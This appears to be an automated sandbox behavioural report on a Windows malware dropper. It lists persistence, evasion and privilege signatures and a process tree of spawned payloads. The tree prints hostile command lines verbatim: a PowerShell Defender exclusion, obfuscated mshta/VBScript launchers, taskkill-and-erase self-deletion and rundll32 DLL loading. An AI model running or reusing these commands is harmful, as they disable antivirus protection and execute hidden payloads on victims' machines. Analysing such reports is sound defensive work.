N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e4750dd01.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CB0I8.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CB0I8.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CB0I8.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19f84b58b3d7.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1624 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1744 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1212 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1768 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0D617825\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\is-CB0I8.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CB0I8.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$4012A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\2077234.exe

"C:\ProgramData\2077234.exe"

C:\ProgramData\591626.exe

"C:\ProgramData\591626.exe"

C:\ProgramData\2240607.exe

"C:\ProgramData\2240607.exe"

C:\Users\Admin\AppData\Local\Temp\is-2AQ7V.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-2AQ7V.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\ProgramData\7024178.exe

"C:\ProgramData\7024178.exe"

C:\ProgramData\238975.exe

"C:\ProgramData\238975.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\7024178.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\7024178.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat19e4750dd01.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0D617825\Sat19e4750dd01.exe" & exit

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat19e4750dd01.exe" /f

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 976

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\ProgramData\2240607.exe

"C:\ProgramData\2240607.exe"

C:\ProgramData\2240607.exe

"C:\ProgramData\2240607.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2696 -s 1392

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\ProgramData\3057965.exe

"C:\ProgramData\3057965.exe"

C:\ProgramData\515307.exe

"C:\ProgramData\515307.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\7024178.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\7024178.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 720

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "7024178.exe" /F

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\cmd.exe

